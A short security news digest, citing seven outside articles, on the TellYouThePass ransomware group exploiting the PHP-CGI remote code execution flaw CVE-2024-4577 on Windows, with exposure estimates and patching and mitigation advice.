Threat actors [2] [4], specifically the ransomware group TellYouThePass, have been exploiting a critical Remote Code Execution (RCE) vulnerability in PHP to execute arbitrary PHP code on targeted systems.

Description

Threat actors [2] [4], specifically the ransomware group TellYouThePass, have been exploiting the critical Remote Code Execution (RCE) vulnerability CVE-2024-4577 in PHP to execute arbitrary PHP code on targeted systems. This vulnerability affects all versions of PHP on Windows and XAMPP on Windows [4]. The attackers have been using the ‘system’ function to run an HTML application file hosted on an attacker-controlled Web server via the mshta.exe binary [5]. They have also been leveraging living-off-the-land tactics to run remote payloads and encrypt files [4], sending details about the infected machine to a C2 server [4]. Imperva researchers have observed that the ransomware operators quickly began exploiting this vulnerability after a proof-of-concept exploit was publicly released [1]. PHP developers have issued security updates to address the RCE vulnerability [1], urging system administrators to upgrade their PHP installations to the latest patched releases [1]. CISA has added CVE-2024-4577 to its Known Exploited Vulnerabilities catalog [4], urging government agencies to patch the flaw by July 3rd [4]. It is estimated that more than 450,000 exposed PHP servers, primarily in the US and Germany [2], could be vulnerable to this exploit [2] [7], which stems from unsafe character encoding conversions on Windows when used in CGI mode [7]. To mitigate the risk of exploitation through CVE-2024-4577, organizations are advised to patch affected systems and consider transitioning to more secure architectures such as Mod-PHP [5], FastCGI [5], or PHP-FPM [5]. Additionally, maintaining a strong awareness of assets and applications in the environment [5], patching vulnerabilities [1] [3] [5] [6], utilizing Web firewall technology [5], and deploying reliable anti-virus programs are recommended to prevent ransomware attacks similar to those conducted by TellYouThePass [5].

Conclusion

Organizations must act swiftly to patch affected systems and transition to more secure architectures to mitigate the risk of exploitation through CVE-2024-4577. Maintaining awareness of assets and applications [5], patching vulnerabilities [1] [3] [5] [6], utilizing Web firewall technology [5], and deploying reliable anti-virus programs are crucial steps to prevent ransomware attacks.

References

[1] https://cybersecuritynews.com/tellyouthepass-php-rce-flaw/
[2] https://www.technadu.com/recent-php-rce-flaw-exploited-by-tellyouthepass-ransomware/532399/
[3] https://www.scmagazine.com/news/php-flaw-exploited-by-tellyouthepass-ransomware-campaign
[4] https://duo.com/decipher/ransomware-attacks-leverage-recent-critical-php-flaw
[5] https://www.darkreading.com/vulnerabilities-threats/tellyouthepass-ransomware-exploits-critical-php-flaw
[6] https://linuxsecurity.com/news/security-vulnerabilities/cve-2024-4577-ransomware
[7] https://cyber.vumetric.com/security-news/2024/06/11/tellyouthepass-ransomware-exploits-recent-php-rce-flaw-to-breach-servers/